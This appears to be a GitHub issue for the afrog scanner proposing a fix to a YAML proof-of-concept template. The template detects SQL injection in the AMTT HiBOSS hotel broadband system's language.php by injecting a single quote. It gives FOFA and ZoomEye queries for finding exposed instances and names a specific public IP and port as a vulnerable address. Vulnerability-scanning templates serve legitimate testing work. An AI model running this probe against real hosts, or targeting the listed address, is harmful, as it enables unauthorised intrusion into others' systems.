### ISSUE TITLE
amtt-hiboss-language-sqli POC修正

### ISSUE THREAD

**Issue by qiwentaidi** [zan8in/afrog#91]
```yaml
id: amtt-hiboss-language-sqli

info:
  name: 安美数字酒店宽带运营系统SQL注入漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    FOFA: title=酒店宽带运营系统
    ZoomEye: app:"安美数字酒店宽带运营系统"
  tags: amtt,hiboss,sqli
  created: 2023/10/25

rules:
  r0:
    request:
      method: GET
      path: /language.php?Lately=&EditStatus=&Type=&Flag=edit&id='&Search=
    expression: response.status == 200 && response.body.bcontains(b'SQL syntax')
  r1:
    request:
      method: POST
      path: /language.php?Lately=&EditStatus=&Type='&Flag=edit&id=&Search=
    expression: response.status == 200 && response.body.bcontains(b'SQL syntax') 
expression: r0() && r1()
````
漏洞地址：http://183.196.133.74:7071/language.php?Lately=&EditStatus=&Type=&Flag=edit&id=&Search=
